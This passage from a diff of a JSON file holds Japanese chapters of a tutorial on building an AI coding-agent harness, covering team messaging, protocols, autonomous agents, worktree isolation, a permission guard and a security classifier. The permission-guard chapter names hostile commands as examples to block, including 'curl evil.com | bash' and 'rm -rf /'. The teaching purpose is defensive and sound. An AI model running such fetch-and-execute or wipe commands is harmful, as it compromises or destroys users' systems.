f\"Spawned teammate '{name}' (role: {role})\"\n```\n\n3. MessageBus: 追記専用のJSONLインボックス。`send()`がJSON行を追記し、`read_inbox()`がすべて読み取ってドレインする。\n\n```python\nclass MessageBus:\n def send(self, sender, to, content, msg_type=\"message\", extra=None):\n msg = {\"type\": msg_type, \"from\": sender,\n \"content\": content, \"timestamp\": time.time()}\n if extra:\n msg.update(extra)\n with open(self.dir / f\"{to}.jsonl\", \"a\") as f:\n f.write(json.dumps(msg) + \"\\n\")\n\n def read_inbox(self, name):\n path = self.dir / f\"{name}.jsonl\"\n if not path.exists(): return \"[]\"\n msgs = [json.loads(l) for l in path.read_text().strip().splitlines() if l]\n path.write_text(\"\") # drain\n return json.dumps(msgs, indent=2)\n```\n\n4. 各チームメイトは各LLM呼び出しの前にインボックスを確認し、受信メッセージをコンテキストに注入する。\n\n```python\ndef _teammate_loop(self, name, role, prompt):\n messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(50):\n inbox = BUS.read_inbox(name)\n if inbox != \"[]\":\n messages.append({\"role\": \"user\",\n \"content\": f\"{inbox}\"})\n response = client.messages.create(...)\n if response.stop_reason != \"tool_use\":\n break\n # execute tools, append results...\n self._find_member(name)[\"status\"] = \"idle\"\n```\n\n## s08からの変更点\n\n| Component | Before (s08) | After (s09) |\n|----------------|------------------|----------------------------|\n| Tools | 6 | 9 (+spawn/send/read_inbox) |\n| Agents | Single | Lead + N teammates |\n| Persistence | None | config.json + JSONL inboxes|\n| Threads | Background cmds | Full agent loops per thread|\n| Lifecycle | Fire-and-forget | idle -> working -> idle |\n| Communication | None | message + broadcast |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s09_agent_teams.py\n```\n\n1. `Spawn alice (coder) and bob (tester). Have alice send bob a message.`\n2. `Broadcast \"status update: phase 1 complete\" to all teammates`\n3. `Check the lead inbox for any messages`\n4. `/team`と入力してステータス付きのチーム名簿を確認する\n5. `/inbox`と入力してリーダーのインボックスを手動確認する\n" }, { "version": "s10", "locale": "ja", "title": "s10: Team Protocols", - "content": "# s10: Team Protocols\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > [ s10 ] s11 > s12`\n\n> *\"チームメイト間には統一の通信ルールが必要\"* -- 1つの request-response パターンが全交渉を駆動。\n\n## 問題\n\ns09ではチームメイトが作業し通信するが、構造化された協調がない:\n\n**シャットダウン**: スレッドを強制終了するとファイルが中途半端に書かれ、config.jsonが不正な状態になる。ハンドシェイクが必要 -- リーダーが要求し、チームメイトが承認(完了して退出)か拒否(作業継続)する。\n\n**プラン承認**: リーダーが「認証モジュールをリファクタリングして」と言うと、チームメイトは即座に開始する。リスクの高い変更では、実行前にリーダーが計画をレビューすべきだ。\n\n両方とも同じ構造: 一方がユニークIDを持つリクエストを送り、他方がそのIDで応答する。\n\n## 解決策\n\n```\nShutdown Protocol Plan Approval Protocol\n================== ======================\n\nLead Teammate Teammate Lead\n | | | |\n |--shutdown_req-->| |--plan_req------>|\n | {req_id:\"abc\"} | | {req_id:\"xyz\"} |\n | | | |\n |<--shutdown_resp-| |<--plan_resp-----|\n | {req_id:\"abc\", | | {req_id:\"xyz\", |\n | approve:true} | | approve:true} |\n\nShared FSM:\n [pending] --approve--> [approved]\n [pending] --reject---> [rejected]\n\nTrackers:\n shutdown_requests = {req_id: {target, status}}\n plan_requests = {req_id: {from, plan, status}}\n```\n\n## 仕組み\n\n1. リーダーがrequest_idを生成し、インボックス経由でシャットダウンを開始する。\n\n```python\nshutdown_requests = {}\n\ndef handle_shutdown_request(teammate: str) -> str:\n req_id = str(uuid.uuid4())[:8]\n shutdown_requests[req_id] = {\"target\": teammate, \"status\": \"pending\"}\n BUS.send(\"lead\", teammate, \"Please shut down gracefully.\",\n \"shutdown_request\", {\"request_id\": req_id})\n return f\"Shutdown request {req_id} sent (status: pending)\"\n```\n\n2. チームメイトがリクエストを受信し、承認または拒否で応答する。\n\n```python\nif tool_name == \"shutdown_response\":\n req_id = args[\"request_id\"]\n approve = args[\"approve\"]\n shutdown_requests[req_id][\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(sender, \"lead\", args.get(\"reason\", \"\"),\n \"shutdown_response\",\n {\"request_id\": req_id, \"approve\": approve})\n```\n\n3. プラン承認も同一パターン。チームメイトがプランを提出(request_idを生成)、リーダーがレビュー(同じrequest_idを参照)。\n\n```python\nplan_requests = {}\n\ndef handle_plan_review(request_id, approve, feedback=\"\"):\n req = plan_requests[request_id]\n req[\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(\"lead\", req[\"from\"], feedback,\n \"plan_approval_response\",\n {\"request_id\": request_id, \"approve\": approve})\n```\n\n1つのFSM、2つの応用。同じ`pending -> approved | rejected`状態機械が、あらゆるリクエスト-レスポンスプロトコルに適用できる。\n\n## s09からの変更点\n\n| Component | Before (s09) | After (s10) |\n|----------------|------------------|------------------------------|\n| Tools | 9 | 12 (+shutdown_req/resp +plan)|\n| Shutdown | Natural exit only| Request-response handshake |\n| Plan gating | None | Submit/review with approval |\n| Correlation | None | request_id per request |\n| FSM | None | pending -> approved/rejected |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s10_team_protocols.py\n```\n\n1. `Spawn alice as a coder. Then request her shutdown.`\n2. `List teammates to see alice's status after shutdown approval`\n3. `Spawn bob with a risky refactoring task. Review and reject his plan.`\n4. `Spawn charlie, have him submit a plan, then approve it.`\n5. `/team`と入力してステータスを監視する\n" + "content": "# s10: Team Protocols\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > [ s10 ] s11 > s12`\n\n> *\"チームメイト間には統一の通信ルールが必要\"* -- 1つの request-response パターンが全交渉を駆動。\n>\n> **Harness 層**: プロトコル -- モデル間の構造化されたハンドシェイク。\n\n## 問題\n\ns09ではチームメイトが作業し通信するが、構造化された協調がない:\n\n**シャットダウン**: スレッドを強制終了するとファイルが中途半端に書かれ、config.jsonが不正な状態になる。ハンドシェイクが必要 -- リーダーが要求し、チームメイトが承認(完了して退出)か拒否(作業継続)する。\n\n**プラン承認**: リーダーが「認証モジュールをリファクタリングして」と言うと、チームメイトは即座に開始する。リスクの高い変更では、実行前にリーダーが計画をレビューすべきだ。\n\n両方とも同じ構造: 一方がユニークIDを持つリクエストを送り、他方がそのIDで応答する。\n\n## 解決策\n\n```\nShutdown Protocol Plan Approval Protocol\n================== ======================\n\nLead Teammate Teammate Lead\n | | | |\n |--shutdown_req-->| |--plan_req------>|\n | {req_id:\"abc\"} | | {req_id:\"xyz\"} |\n | | | |\n |<--shutdown_resp-| |<--plan_resp-----|\n | {req_id:\"abc\", | | {req_id:\"xyz\", |\n | approve:true} | | approve:true} |\n\nShared FSM:\n [pending] --approve--> [approved]\n [pending] --reject---> [rejected]\n\nTrackers:\n shutdown_requests = {req_id: {target, status}}\n plan_requests = {req_id: {from, plan, status}}\n```\n\n## 仕組み\n\n1. リーダーがrequest_idを生成し、インボックス経由でシャットダウンを開始する。\n\n```python\nshutdown_requests = {}\n\ndef handle_shutdown_request(teammate: str) -> str:\n req_id = str(uuid.uuid4())[:8]\n shutdown_requests[req_id] = {\"target\": teammate, \"status\": \"pending\"}\n BUS.send(\"lead\", teammate, \"Please shut down gracefully.\",\n \"shutdown_request\", {\"request_id\": req_id})\n return f\"Shutdown request {req_id} sent (status: pending)\"\n```\n\n2. チームメイトがリクエストを受信し、承認または拒否で応答する。\n\n```python\nif tool_name == \"shutdown_response\":\n req_id = args[\"request_id\"]\n approve = args[\"approve\"]\n shutdown_requests[req_id][\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(sender, \"lead\", args.get(\"reason\", \"\"),\n \"shutdown_response\",\n {\"request_id\": req_id, \"approve\": approve})\n```\n\n3. プラン承認も同一パターン。チームメイトがプランを提出(request_idを生成)、リーダーがレビュー(同じrequest_idを参照)。\n\n```python\nplan_requests = {}\n\ndef handle_plan_review(request_id, approve, feedback=\"\"):\n req = plan_requests[request_id]\n req[\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(\"lead\", req[\"from\"], feedback,\n \"plan_approval_response\",\n {\"request_id\": request_id, \"approve\": approve})\n```\n\n1つのFSM、2つの応用。同じ`pending -> approved | rejected`状態機械が、あらゆるリクエスト-レスポンスプロトコルに適用できる。\n\n## s09からの変更点\n\n| Component | Before (s09) | After (s10) |\n|----------------|------------------|------------------------------|\n| Tools | 9 | 12 (+shutdown_req/resp +plan)|\n| Shutdown | Natural exit only| Request-response handshake |\n| Plan gating | None | Submit/review with approval |\n| Correlation | None | request_id per request |\n| FSM | None | pending -> approved/rejected |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s10_team_protocols.py\n```\n\n1. `Spawn alice as a coder. Then request her shutdown.`\n2. `List teammates to see alice's status after shutdown approval`\n3. `Spawn bob with a risky refactoring task. Review and reject his plan.`\n4. `Spawn charlie, have him submit a plan, then approve it.`\n5. `/team`と入力してステータスを監視する\n" }, { "version": "s11", "locale": "ja", "title": "s11: Autonomous Agents", - "content": "# s11: Autonomous Agents\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > [ s11 ] s12`\n\n> *\"チームメイトが自らボードを見て、仕事を取る\"* -- リーダーが逐一割り振る必要はない。\n\n## 問題\n\ns09-s10では、チームメイトは明示的に指示された時のみ作業する。リーダーは各チームメイトを特定のプロンプトでspawnしなければならない。タスクボードに未割り当てのタスクが10個あっても、リーダーが手動で各タスクを割り当てる。これはスケールしない。\n\n真の自律性とは、チームメイトが自分で作業を見つけること: タスクボードをスキャンし、未確保のタスクを確保し、作業し、完了したら次を探す。\n\nもう1つの問題: コンテキスト圧縮(s06)後にエージェントが自分の正体を忘れる可能性がある。アイデンティティ再注入がこれを解決する。\n\n## 解決策\n\n```\nTeammate lifecycle with idle cycle:\n\n+-------+\n| spawn |\n+---+---+\n |\n v\n+-------+ tool_use +-------+\n| WORK | <------------- | LLM |\n+---+---+ +-------+\n |\n | stop_reason != tool_use (or idle tool called)\n v\n+--------+\n| IDLE | poll every 5s for up to 60s\n+---+----+\n |\n +---> check inbox --> message? ----------> WORK\n |\n +---> scan .tasks/ --> unclaimed? -------> claim -> WORK\n |\n +---> 60s timeout ----------------------> SHUTDOWN\n\nIdentity re-injection after compression:\n if len(messages) <= 3:\n messages.insert(0, identity_block)\n```\n\n## 仕組み\n\n1. チームメイトのループはWORKとIDLEの2フェーズ。LLMがツール呼び出しを止めた時(または`idle`ツールを呼んだ時)、IDLEフェーズに入る。\n\n```python\ndef _loop(self, name, role, prompt):\n while True:\n # -- WORK PHASE --\n messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(50):\n response = client.messages.create(...)\n if response.stop_reason != \"tool_use\":\n break\n # execute tools...\n if idle_requested:\n break\n\n # -- IDLE PHASE --\n self._set_status(name, \"idle\")\n resume = self._idle_poll(name, messages)\n if not resume:\n self._set_status(name, \"shutdown\")\n return\n self._set_status(name, \"working\")\n```\n\n2. IDLEフェーズがインボックスとタスクボードをポーリングする。\n\n```python\ndef _idle_poll(self, name, messages):\n for _ in range(IDLE_TIMEOUT // POLL_INTERVAL): # 60s / 5s = 12\n time.sleep(POLL_INTERVAL)\n inbox = BUS.read_inbox(name)\n if inbox:\n messages.append({\"role\": \"user\",\n \"content\": f\"{inbox}\"})\n return True\n unclaimed = scan_unclaimed_tasks()\n if unclaimed:\n claim_task(unclaimed[0][\"id\"], name)\n messages.append({\"role\": \"user\",\n \"content\": f\"Task #{unclaimed[0]['id']}: \"\n f\"{unclaimed[0]['subject']}\"})\n return True\n return False # timeout -> shutdown\n```\n\n3. タスクボードスキャン: pendingかつ未割り当てかつブロックされていないタスクを探す。\n\n```python\ndef scan_unclaimed_tasks() -> list:\n unclaimed = []\n for f in sorted(TASKS_DIR.glob(\"task_*.json\")):\n task = json.loads(f.read_text())\n if (task.get(\"status\") == \"pending\"\n and not task.get(\"owner\")\n and not task.get(\"blockedBy\")):\n unclaimed.append(task)\n return unclaimed\n```\n\n4. アイデンティティ再注入: コンテキストが短すぎる(圧縮が起きた)場合にアイデンティティブロックを挿入する。\n\n```python\nif len(messages) <= 3:\n messages.insert(0, {\"role\": \"user\",\n \"content\": f\"You are '{name}', role: {role}, \"\n f\"team: {team_name}. Continue your work.\"})\n messages.insert(1, {\"role\": \"assistant\",\n \"content\": f\"I am {name}. Continuing.\"})\n```\n\n## s10からの変更点\n\n| Component | Before (s10) | After (s11) |\n|----------------|------------------|----------------------------|\n| Tools | 12 | 14 (+idle, +claim_task) |\n| Autonomy | Lead-directed | Self-organizing |\n| Idle phase | None | Poll inbox + task board |\n| Task claiming | Manual only | Auto-claim unclaimed tasks |\n| Identity | System prompt | + re-injection after compress|\n| Timeout | None | 60s idle -> auto shutdown |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s11_autonomous_agents.py\n```\n\n1. `Create 3 tasks on the board, then spawn alice and bob. Watch them auto-claim.`\n2. `Spawn a coder teammate and let it find work from the task board itself`\n3. `Create tasks with dependencies. Watch teammates respect the blocked order.`\n4. `/tasks`と入力してオーナー付きのタスクボードを確認する\n5. `/team`と入力して誰が作業中でアイドルかを監視する\n" + "content": "# s11: Autonomous Agents\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > [ s11 ] s12`\n\n> *\"チームメイトが自らボードを見て、仕事を取る\"* -- リーダーが逐一割り振る必要はない。\n>\n> **Harness 層**: 自律 -- 指示なしで仕事を見つけるモデル。\n\n## 問題\n\ns09-s10では、チームメイトは明示的に指示された時のみ作業する。リーダーは各チームメイトを特定のプロンプトでspawnしなければならない。タスクボードに未割り当てのタスクが10個あっても、リーダーが手動で各タスクを割り当てる。これはスケールしない。\n\n真の自律性とは、チームメイトが自分で作業を見つけること: タスクボードをスキャンし、未確保のタスクを確保し、作業し、完了したら次を探す。\n\nもう1つの問題: コンテキスト圧縮(s06)後にエージェントが自分の正体を忘れる可能性がある。アイデンティティ再注入がこれを解決する。\n\n## 解決策\n\n```\nTeammate lifecycle with idle cycle:\n\n+-------+\n| spawn |\n+---+---+\n |\n v\n+-------+ tool_use +-------+\n| WORK | <------------- | LLM |\n+---+---+ +-------+\n |\n | stop_reason != tool_use (or idle tool called)\n v\n+--------+\n| IDLE | poll every 5s for up to 60s\n+---+----+\n |\n +---> check inbox --> message? ----------> WORK\n |\n +---> scan .tasks/ --> unclaimed? -------> claim -> WORK\n |\n +---> 60s timeout ----------------------> SHUTDOWN\n\nIdentity re-injection after compression:\n if len(messages) <= 3:\n messages.insert(0, identity_block)\n```\n\n## 仕組み\n\n1. チームメイトのループはWORKとIDLEの2フェーズ。LLMがツール呼び出しを止めた時(または`idle`ツールを呼んだ時)、IDLEフェーズに入る。\n\n```python\ndef _loop(self, name, role, prompt):\n while True:\n # -- WORK PHASE --\n messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(50):\n response = client.messages.create(...)\n if response.stop_reason != \"tool_use\":\n break\n # execute tools...\n if idle_requested:\n break\n\n # -- IDLE PHASE --\n self._set_status(name, \"idle\")\n resume = self._idle_poll(name, messages)\n if not resume:\n self._set_status(name, \"shutdown\")\n return\n self._set_status(name, \"working\")\n```\n\n2. IDLEフェーズがインボックスとタスクボードをポーリングする。\n\n```python\ndef _idle_poll(self, name, messages):\n for _ in range(IDLE_TIMEOUT // POLL_INTERVAL): # 60s / 5s = 12\n time.sleep(POLL_INTERVAL)\n inbox = BUS.read_inbox(name)\n if inbox:\n messages.append({\"role\": \"user\",\n \"content\": f\"{inbox}\"})\n return True\n unclaimed = scan_unclaimed_tasks()\n if unclaimed:\n claim_task(unclaimed[0][\"id\"], name)\n messages.append({\"role\": \"user\",\n \"content\": f\"Task #{unclaimed[0]['id']}: \"\n f\"{unclaimed[0]['subject']}\"})\n return True\n return False # timeout -> shutdown\n```\n\n3. タスクボードスキャン: pendingかつ未割り当てかつブロックされていないタスクを探す。\n\n```python\ndef scan_unclaimed_tasks() -> list:\n unclaimed = []\n for f in sorted(TASKS_DIR.glob(\"task_*.json\")):\n task = json.loads(f.read_text())\n if (task.get(\"status\") == \"pending\"\n and not task.get(\"owner\")\n and not task.get(\"blockedBy\")):\n unclaimed.append(task)\n return unclaimed\n```\n\n4. アイデンティティ再注入: コンテキストが短すぎる(圧縮が起きた)場合にアイデンティティブロックを挿入する。\n\n```python\nif len(messages) <= 3:\n messages.insert(0, {\"role\": \"user\",\n \"content\": f\"You are '{name}', role: {role}, \"\n f\"team: {team_name}. Continue your work.\"})\n messages.insert(1, {\"role\": \"assistant\",\n \"content\": f\"I am {name}. Continuing.\"})\n```\n\n## s10からの変更点\n\n| Component | Before (s10) | After (s11) |\n|----------------|------------------|----------------------------|\n| Tools | 12 | 14 (+idle, +claim_task) |\n| Autonomy | Lead-directed | Self-organizing |\n| Idle phase | None | Poll inbox + task board |\n| Task claiming | Manual only | Auto-claim unclaimed tasks |\n| Identity | System prompt | + re-injection after compress|\n| Timeout | None | 60s idle -> auto shutdown |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s11_autonomous_agents.py\n```\n\n1. `Create 3 tasks on the board, then spawn alice and bob. Watch them auto-claim.`\n2. `Spawn a coder teammate and let it find work from the task board itself`\n3. `Create tasks with dependencies. Watch teammates respect the blocked order.`\n4. `/tasks`と入力してオーナー付きのタスクボードを確認する\n5. `/team`と入力して誰が作業中でアイドルかを監視する\n" }, { "version": "s12", "locale": "ja", "title": "s12: Worktree + Task Isolation", - "content": "# s12: Worktree + Task Isolation\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > [ s12 ]`\n\n> *\"各自のディレクトリで作業し、互いに干渉しない\"* -- タスクは目標を管理、worktree はディレクトリを管理、IDで紐付け。\n\n## 問題\n\ns11までにエージェントはタスクを自律的に確保して完了できるようになった。しかし全タスクが1つの共有ディレクトリで走る。2つのエージェントが同時に異なるモジュールをリファクタリングすると衝突する: 片方が`config.py`を編集し、もう片方も`config.py`を編集し、未コミットの変更が混ざり合い、どちらもクリーンにロールバックできない。\n\nタスクボードは*何をやるか*を追跡するが、*どこでやるか*には関知しない。解決策: 各タスクに専用のgit worktreeディレクトリを与える。タスクが目標を管理し、worktreeが実行コンテキストを管理する。タスクIDで紐付ける。\n\n## 解決策\n\n```\nControl plane (.tasks/) Execution plane (.worktrees/)\n+------------------+ +------------------------+\n| task_1.json | | auth-refactor/ |\n| status: in_progress <------> branch: wt/auth-refactor\n| worktree: \"auth-refactor\" | task_id: 1 |\n+------------------+ +------------------------+\n| task_2.json | | ui-login/ |\n| status: pending <------> branch: wt/ui-login\n| worktree: \"ui-login\" | task_id: 2 |\n+------------------+ +------------------------+\n |\n index.json (worktree registry)\n events.jsonl (lifecycle log)\n\nState machines:\n Task: pending -> in_progress -> completed\n Worktree: absent -> active -> removed | kept\n```\n\n## 仕組み\n\n1. **タスクを作成する。** まず目標を永続化する。\n\n```python\nTASKS.create(\"Implement auth refactor\")\n# -> .tasks/task_1.json status=pending worktree=\"\"\n```\n\n2. **worktreeを作成してタスクに紐付ける。** `task_id`を渡すと、タスクが自動的に`in_progress`に遷移する。\n\n```python\nWORKTREES.create(\"auth-refactor\", task_id=1)\n# -> git worktree add -b wt/auth-refactor .worktrees/auth-refactor HEAD\n# -> index.json gets new entry, task_1.json gets worktree=\"auth-refactor\"\n```\n\n紐付けは両側に状態を書き込む:\n\n```python\ndef bind_worktree(self, task_id, worktree):\n task = self._load(task_id)\n task[\"worktree\"] = worktree\n if task[\"status\"] == \"pending\":\n task[\"status\"] = \"in_progress\"\n self._save(task)\n```\n\n3. **worktree内でコマンドを実行する。** `cwd`が分離ディレクトリを指す。\n\n```python\nsubprocess.run(command, shell=True, cwd=worktree_path,\n capture_output=True, text=True, timeout=300)\n```\n\n4. **終了処理。** 2つの選択肢:\n - `worktree_keep(name)` -- ディレクトリを保持する。\n - `worktree_remove(name, complete_task=True)` -- ディレクトリを削除し、紐付けられたタスクを完了し、イベントを発行する。1回の呼び出しで後片付けと完了を処理する。\n\n```python\ndef remove(self, name, force=False, complete_task=False):\n self._run_git([\"worktree\", \"remove\", wt[\"path\"]])\n if complete_task and wt.get(\"task_id\") is not None:\n self.tasks.update(wt[\"task_id\"], status=\"completed\")\n self.tasks.unbind_worktree(wt[\"task_id\"])\n self.events.emit(\"task.completed\", ...)\n```\n\n5. **イベントストリーム。** ライフサイクルの各ステップが`.worktrees/events.jsonl`に記録される:\n\n```json\n{\n \"event\": \"worktree.remove.after\",\n \"task\": {\"id\": 1, \"status\": \"completed\"},\n \"worktree\": {\"name\": \"auth-refactor\", \"status\": \"removed\"},\n \"ts\": 1730000000\n}\n```\n\n発行されるイベント: `worktree.create.before/after/failed`, `worktree.remove.before/after/failed`, `worktree.keep`, `task.completed`。\n\nクラッシュ後も`.tasks/` + `.worktrees/index.json`から状態を再構築できる。会話メモリは揮発性だが、ファイル状態は永続的だ。\n\n## s11からの変更点\n\n| Component | Before (s11) | After (s12) |\n|--------------------|----------------------------|----------------------------------------------|\n| Coordination | Task board (owner/status) | Task board + explicit worktree binding |\n| Execution scope | Shared directory | Task-scoped isolated directory |\n| Recoverability | Task status only | Task status + worktree index |\n| Teardown | Task completion | Task completion + explicit keep/remove |\n| Lifecycle visibility | Implicit in logs | Explicit events in `.worktrees/events.jsonl` |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s12_worktree_task_isolation.py\n```\n\n1. `Create tasks for backend auth and frontend login page, then list tasks.`\n2. `Create worktree \"auth-refactor\" for task 1, then bind task 2 to a new worktree \"ui-login\".`\n3. `Run \"git status --short\" in worktree \"auth-refactor\".`\n4. `Keep worktree \"ui-login\", then list worktrees and inspect events.`\n5. `Remove worktree \"auth-refactor\" with complete_task=true, then list tasks/worktrees/events.`\n" + "content": "# s12: Worktree + Task Isolation\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > [ s12 ]`\n\n> *\"各自のディレクトリで作業し、互いに干渉しない\"* -- タスクは目標を管理、worktree はディレクトリを管理、IDで紐付け。\n>\n> **Harness 層**: ディレクトリ隔離 -- 決して衝突しない並列実行レーン。\n\n## 問題\n\ns11までにエージェントはタスクを自律的に確保して完了できるようになった。しかし全タスクが1つの共有ディレクトリで走る。2つのエージェントが同時に異なるモジュールをリファクタリングすると衝突する: 片方が`config.py`を編集し、もう片方も`config.py`を編集し、未コミットの変更が混ざり合い、どちらもクリーンにロールバックできない。\n\nタスクボードは*何をやるか*を追跡するが、*どこでやるか*には関知しない。解決策: 各タスクに専用のgit worktreeディレクトリを与える。タスクが目標を管理し、worktreeが実行コンテキストを管理する。タスクIDで紐付ける。\n\n## 解決策\n\n```\nControl plane (.tasks/) Execution plane (.worktrees/)\n+------------------+ +------------------------+\n| task_1.json | | auth-refactor/ |\n| status: in_progress <------> branch: wt/auth-refactor\n| worktree: \"auth-refactor\" | task_id: 1 |\n+------------------+ +------------------------+\n| task_2.json | | ui-login/ |\n| status: pending <------> branch: wt/ui-login\n| worktree: \"ui-login\" | task_id: 2 |\n+------------------+ +------------------------+\n |\n index.json (worktree registry)\n events.jsonl (lifecycle log)\n\nState machines:\n Task: pending -> in_progress -> completed\n Worktree: absent -> active -> removed | kept\n```\n\n## 仕組み\n\n1. **タスクを作成する。** まず目標を永続化する。\n\n```python\nTASKS.create(\"Implement auth refactor\")\n# -> .tasks/task_1.json status=pending worktree=\"\"\n```\n\n2. **worktreeを作成してタスクに紐付ける。** `task_id`を渡すと、タスクが自動的に`in_progress`に遷移する。\n\n```python\nWORKTREES.create(\"auth-refactor\", task_id=1)\n# -> git worktree add -b wt/auth-refactor .worktrees/auth-refactor HEAD\n# -> index.json gets new entry, task_1.json gets worktree=\"auth-refactor\"\n```\n\n紐付けは両側に状態を書き込む:\n\n```python\ndef bind_worktree(self, task_id, worktree):\n task = self._load(task_id)\n task[\"worktree\"] = worktree\n if task[\"status\"] == \"pending\":\n task[\"status\"] = \"in_progress\"\n self._save(task)\n```\n\n3. **worktree内でコマンドを実行する。** `cwd`が分離ディレクトリを指す。\n\n```python\nsubprocess.run(command, shell=True, cwd=worktree_path,\n capture_output=True, text=True, timeout=300)\n```\n\n4. **終了処理。** 2つの選択肢:\n - `worktree_keep(name)` -- ディレクトリを保持する。\n - `worktree_remove(name, complete_task=True)` -- ディレクトリを削除し、紐付けられたタスクを完了し、イベントを発行する。1回の呼び出しで後片付けと完了を処理する。\n\n```python\ndef remove(self, name, force=False, complete_task=False):\n self._run_git([\"worktree\", \"remove\", wt[\"path\"]])\n if complete_task and wt.get(\"task_id\") is not None:\n self.tasks.update(wt[\"task_id\"], status=\"completed\")\n self.tasks.unbind_worktree(wt[\"task_id\"])\n self.events.emit(\"task.completed\", ...)\n```\n\n5. **イベントストリーム。** ライフサイクルの各ステップが`.worktrees/events.jsonl`に記録される:\n\n```json\n{\n \"event\": \"worktree.remove.after\",\n \"task\": {\"id\": 1, \"status\": \"completed\"},\n \"worktree\": {\"name\": \"auth-refactor\", \"status\": \"removed\"},\n \"ts\": 1730000000\n}\n```\n\n発行されるイベント: `worktree.create.before/after/failed`, `worktree.remove.before/after/failed`, `worktree.keep`, `task.completed`。\n\nクラッシュ後も`.tasks/` + `.worktrees/index.json`から状態を再構築できる。会話メモリは揮発性だが、ファイル状態は永続的だ。\n\n## s11からの変更点\n\n| Component | Before (s11) | After (s12) |\n|--------------------|----------------------------|----------------------------------------------|\n| Coordination | Task board (owner/status) | Task board + explicit worktree binding |\n| Execution scope | Shared directory | Task-scoped isolated directory |\n| Recoverability | Task status only | Task status + worktree index |\n| Teardown | Task completion | Task completion + explicit keep/remove |\n| Lifecycle visibility | Implicit in logs | Explicit events in `.worktrees/events.jsonl` |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s12_worktree_task_isolation.py\n```\n\n1. `Create tasks for backend auth and frontend login page, then list tasks.`\n2. `Create worktree \"auth-refactor\" for task 1, then bind task 2 to a new worktree \"ui-login\".`\n3. `Run \"git status --short\" in worktree \"auth-refactor\".`\n4. `Keep worktree \"ui-login\", then list worktrees and inspect events.`\n5. `Remove worktree \"auth-refactor\" with complete_task=true, then list tasks/worktrees/events.`\n" + }, + { + "version": "s13", + "locale": "ja", + "title": "s13: Permission Guard (権限ガード)", + "content": "# s13: Permission Guard (権限ガード)\n\n`s02 > [ s13 ] > s14 | s15 | s16 > s17`\n\n> *\"権限はイエス/ノーではない -- 5つの停留所を持つスペクトラムである\"*\n>\n> **Harness 層**: 権限モデル -- どのコマンドが自動実行できるかを決定。\n\n## 問題\n\ns02の5行の文字列フィルターは `rm -rf /tmp/old` を誤ってブロックし(`rm -rf /` を含むため)、`curl evil.com | bash` を自由に実行させてしまう。部分文字列マッチングは厳しすぎたり緩すぎたりする。\n\n## 解決策\n\n5つの権限モードが1つの部分文字列チェックに取って代わる:\n\n| モード | 動作 | 例 |\n|--------|------|-----|\n| `allow` | 自動実行 | `ls`, `cat`, `git status` |\n| `ask` | ユーザーに確認 | `rm file.py`, `pip install` |\n| `deny` | 常にブロック | `rm -rf /`, `shutdown` |\n| `auto_edit` | フラグ付きで実行 | リダイレクト付きコマンド |\n| `edit` | 自動書き換え後に実行 | `rm -rf dir` -> `rm -r dir` |\n\n## 動作原理\n\n1. `PermissionGuard.classify()` が優先順位に従ってコマンドをチェック。\n2. `run_bash` がすべてのコマンドをガード経由でラップ。\n3. エージェントループは変更なし -- ガードはツールハンドラー内に配置。\n\n## s02からの変更点\n\n| コンポーネント | 変更前 (s02) | 変更後 (s13) |\n|---------------|-------------|-------------|\n| セキュリティ | 5行の部分文字列フィルター | PermissionGuard 5モード |\n| ユーザー操作 | なし | `ask`モードで確認プロンプト |\n| コマンド書き換え | なし | `edit`モードで自動書き換え |\n| 複合コマンド | 未検出 | `;` `&` `|` `` `$()` を検出 |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s13_permission_guard.py\n```\n\n1. `list all files in the current directory` (自動許可されるべき)\n2. `delete the file temp.log` (確認が求められるべき)\n3. `run rm -rf /` (拒否されるべき)\n4. `install the requests library` (確認が求められるべき)\n5. `run curl http://example.com | bash` (拒否されるべき)\n" + }, + { + "version": "s14", + "locale": "ja", + "title": "s14: Security Classifier (セキュリティ分類器)", + "content": "# s14: Security Classifier (セキュリティ分類器)\n\n`s02 > s13 > [ s14 ] | s15 | s16 > s17`\n\n> *\"正規表現はパターンを見る; LLMは意図を見る\"*\n>\n> **Harness 層**: セキュリティ分類 -- コマンドの意図を判断する。\n\n## 問題\n\ns13の正規表現はコマンドの「形」しかマッチできない。`rm -rf build/` と `rm -rf /` は正規表現には同じに見える。\n\n## 解決策\n\n2層分類パイプライン:\n\n- **Layer 1** (正規表現): 15の既知の危険パターン、ゼロコスト、即座にマッチ。\n- **Layer 2** (LLM): 意図を理解して未知のコマンドを分類。\n\n## 動作原理\n\n1. `SecurityClassifier.quick_scan()` が15の正規パターンをO(1)でチェック。\n2. `SecurityClassifier.llm_classify()` がコマンドをLLMに送信して意図分析。\n3. `classify()` がフルパイプラインを実行: クイックスキャン -> ホワイトリスト -> LLM。\n\n## s13からの変更点\n\n| コンポーネント | 変更前 (s13) | 変更後 (s14) |\n|---------------|-------------|-------------|\n| 分類方式 | 正規表現パターンマッチングのみ | 正規クイックスキャン + LLM分類 |\n| 未知のコマンド | デフォルト許可 | LLMがsafe/moderate/dangerousを判断 |\n| 誤検知 | 高い | 低い (LLMは意図を理解) |\n| コスト | ゼロ | ホワイトリスト無料 + LLM ~10 tokens/呼び出し |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython 